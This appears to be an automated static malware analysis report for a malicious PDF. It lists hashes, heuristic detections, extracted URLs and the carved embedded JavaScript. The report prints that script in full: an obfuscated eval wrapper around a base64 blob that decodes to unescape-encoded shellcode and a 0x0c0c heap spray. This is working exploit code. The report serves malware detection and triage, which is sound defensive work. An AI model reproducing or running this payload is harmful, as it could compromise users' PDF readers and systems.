Malicious PDF — malware analysis report

Static analysis result for SHA-256 dcf0871c307eb0ad…

MALICIOUS

PDF

44.8 KB First seen: 2026-05-09
MD5: 02e5be478e0a488f29799d060dd4cf19 SHA-1: 5248150ec415cb5d2883a4bf3710d80662c57aad SHA-256: dcf0871c307eb0adee0aa5a2cff1921a5d97788b9d5ba23d4f59b01fdc24fe05
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file exhibits multiple heuristic firings related to embedded JavaScript and XFA forms, indicating a potential for malicious scripting. The presence of an embedded JavaScript file, 'javascript_obj0012_000.js', strongly suggests that the document is intended to execute code. This script is likely responsible for downloading and executing a second-stage payload, a common technique for malware delivery. The confidence is moderate due to the lack of specific IOCs beyond the embedded script filename and the benign reputation of the extracted URLs.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
        chr3 = ((enc3 & 3) << 6) | enc4;
    output = output + String.fromCharCode(chr1);
    if (enc3 != 64) {
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com Referenced by PDF JavaScript
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xA0B3 3815 bytes
SHA-256: 177b6f534acb1e0047eb4f1ea3e256f278c1e1cb04a03fff8c0d13444d37ebce
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 45 of 62 identifiers look randomly generated (e.g. 'YyIgKTsgd2hpbGUgKGVjLmxlbmd0aCArIDIwICsg') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s='IHZhciBKTWtiID0gdW5lc2NhcGU7IHZhciBnZG8gPSBKTWtiKCAiJXU0MTQx
JXU0MTQxJXU2M2E1JXU0YTgwJXUwMDAwJXU0YThhJXUyMTk2JXU0YTgwJXUx
ZjkwJXU0YTgwJXU5MDNjJXU0YTg0JXViNjkyJXU0YTgwJXUxMDY0JXU0YTgw
JXUyMmM4JXU0YTg1JXUwMDAwJXUxMDAwJXUwMDAwJXUwMDAwJXUwMDAwJXUw
MDAwJXUwMDAyJXUwMDAwJXUwMTAyJXUwMDAwJXUwMDAwJXUwMDAwJXU2M2E1
JXU0YTgwJXUxMDY0JXU0YTgwJXUyZGIyJXU0YTg0JXUyYWIxJXU0YTgwJXUw
MDA4JXUwMDAwJXVhOGE2JXU0YTgwJXUxZjkwJXU0YTgwJXU5MDM4JXU0YTg0
JXViNjkyJXU0YTgwJXUxMDY0JXU0YTgwJXVmZmZmJXVmZmZmJXUwMDAwJXUw
MDAwJXUwMDQwJXUwMDAwJXUwMDAwJXUwMDAwJXUwMDAwJXUwMDAxJXUwMDAw
JXUwMDAwJXU2M2E1JXU0YTgwJXUxMDY0JXU0YTgwJXUyZGIyJXU0YTg0JXUy
YWIxJXU0YTgwJXUwMDA4JXUwMDAwJXVhOGE2JXU0YTgwJXUxZjkwJXU0YTgw
JXU5MDMwJXU0YTg0JXViNjkyJXU0YTgwJXUxMDY0JXU0YTgwJXVmZmZmJXVm
ZmZmJXUwMDIyJXUwMDAwJXUwMDAwJXUwMDAwJXUwMDAwJXUwMDAwJXUwMDAw
JXUwMDAxJXU2M2E1JXU0YTgwJXUwMDA0JXU0YThhJXUyMTk2JXU0YTgwJXU2
M2E1JXU0YTgwJXUxMDY0JXU0YTgwJXUyZGIyJXU0YTg0JXUyYWIxJXU0YTgw
JXUwMDMwJXUwMDAwJXVhOGE2JXU0YTgwJXUxZjkwJXU0YTgwJXUwMDA0JXU0
YThhJXVhN2Q4JXU0YTgwJXU2M2E1JXU0YTgwJXUxMDY0JXU0YTgwJXUyZGIy
JXU0YTg0JXUyYWIxJXU0YTgwJXUwMDIwJXUwMDAwJXVhOGE2JXU0YTgwJXU2
M2E1JXU0YTgwJXUxMDY0JXU0YTgwJXVhZWRjJXU0YTgwJXUxZjkwJXU0YTgw
JXUwMDM0JXUwMDAwJXVkNTg1JXU0YTgwJXU2M2E1JXU0YTgwJXUxMDY0JXU0
YTgwJXUyZGIyJXU0YTg0JXUyYWIxJXU0YTgwJXUwMDBhJXUwMDAwJXVhOGE2
JXU0YTgwJXUxZjkwJXU0YTgwJXU5MTcwJXU0YTg0JXViNjkyJXU0YTgwJXVm
ZmZmJXVmZmZmJXVmZmZmJXVmZmZmJXVmZmZmJXVmZmZmJXUxMDAwJXUwMDAw
JXUzN2JkJXViMjI4JXUzMzU0JXViMWM5JXVkYjMzJXVkOWNhJXUyNDc0JXU1
OGY0JXU2ODMxJXU4MzBlJXVmY2U4JXU1ZjAzJXU1MDIyJXU2M2ExJXUxZGRh
JXU5YjRhJXU3ZTFiJXU3ZWMyJXVhYzJhJXUwYmIwJXU2MDFmJXU1OWIyJXUw
YmFjJXU0OTk2JXU3OTI3JXU3ZTNmJXUzNDgwJXViMTE5JXVmOTExJXUxZGE1
JXU5YmQxJXU1ZjU5JXU3YzA2JXU5MDYzJXU3ZDViJXVjY2E0JXUyZjk0JXU5
YjdkJXVjMDA3JXVkOTBhJXVlMTliJXU1NmRjJXU5OWEzJXVhODU5JXUxMDUw
JXVmODYzJXUyZmM5JXVlMDJiJXU3NzYyJXUxMThjJXU2YmE2JXU1OGYwJXU1
OGMzJXU1YjgyJXU5MTA1JXU2YTZiJXU3ZTY5JXU0MzUyJXU3ZTY0JXU2Mzky
JXVmNTk3JXU5MGU4JXUwZTJhJXVlYjJiJXU5YmYwJXU0YmFlJXUzYjcyJXU2
YTBiJXVkYTU3JXU2MGQ4JXVhODFjJXU2NDg3JXU3ZGEzJXU5MGJjJXU4MDI4
JXUxMTEzJXVhNzZhJXU3YWI3JXVjNjI4JXUyNmVlJXVmNzlmJXU4ZWYxJXU1
MjQwJXUzYzc5JXVlNDk0JXUyYTIwJXU2NDZiJXUxMzVmJXU3NjZiJXUzMzYw
JXU0NzA0JXVkY2ViJXU1ODUzJXU5OTNlJXUxMmFjJXU4YjYzJXVmYjI0JXU4
ZWYxJXVmYzI4JXVjYzJmJXU3ZjU0JXVhY2RhJXU5ZmEyJXVhOWFmJXUyN2Vm
JXVjMzQzJXVjMjYwJXU3MDYzJXVjNzgwJXUxNzA3JXU4YjEyJXViMmU5JXUy
ZTkyJXU0MWY2ICk7IHZhciBlYyA9IEpNa2IoICIlIiArICJ1IiArICIwIiAr
ICJjIiArICIwIiArICJjIiArICIldSIgKyAiMCIgKyAiYyIgKyAiMCIgKyAi
YyIgKTsgd2hpbGUgKGVjLmxlbmd0aCArIDIwICsgOCA8IDY1NTM2KSBlYys9
ZWM7IEJub0thID0gZWMuc3Vic3RyaW5nKDAsICgweDBjMGMtMHgyNCkvMik7
IEJub0thICs9IGdkbzsgQm5vS2EgKz0gZWM7IEEgPSBCbm9LYS5zdWJzdHJp
bmcoMCwgNjU1MzYvMik7IHdoaWxlKEEubGVuZ3RoIDwgMHg4MDAwMCkgQSAr
PSBBOyBoeiA9IEEuc3Vic3RyaW5nKDAsIDB4ODAwMDAgLSAoMHgxMDIwLTB4
MDgpIC8gMik7IHZhciBYZEMgPSBuZXcgQXJyYXkoKTsgZm9yICh0anV5Qj0w
O3RqdXlCPDB4MWYwO3RqdXlCKyspIFhkQ1t0anV5Ql09aHorInMiOyA=
';
    function decode(input) {
			var output = "";
			var chr1, chr2, chr3;
			var enc1, enc2, enc3, enc4;
			var i = 0;
			input = input.replace(/[^A-Za-z0-9+/=]/g, "");
			while (i < input.length) {
				enc1 = this._keyStr.indexOf(input.charAt(i++));
				enc2 = this._keyStr.indexOf(input.charAt(i++));
				enc3 = this._keyStr.indexOf(input.charAt(i++));
				enc4 = this._keyStr.indexOf(input.charAt(i++));
				chr1 = (enc1 << 2) | (enc2 >> 4);
				chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
				chr3 = ((enc3 & 3) << 6) | enc4;
				output = output + String.fromCharCode(chr1);
				if (enc3 != 64) {
					output = output + String.fromCharCode(chr2);
				}
				if (enc4 != 64) {
					output = output + String.fromCharCode(chr3);
				}
			}
			output = Base64._utf8_decode(output);
			return output;
		}

//eva(s.split("").reverse().join(""));
eva(decode(s));
font_00_sfnt_off0000033c.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x33C 65932 bytes
SHA-256: 3b64a0f7caca6fadf42df0668be5fc7c5363642b7d8b50c0bda676ffc437c6a6

Open this report in the interactive analyzer, or submit your own file for analysis.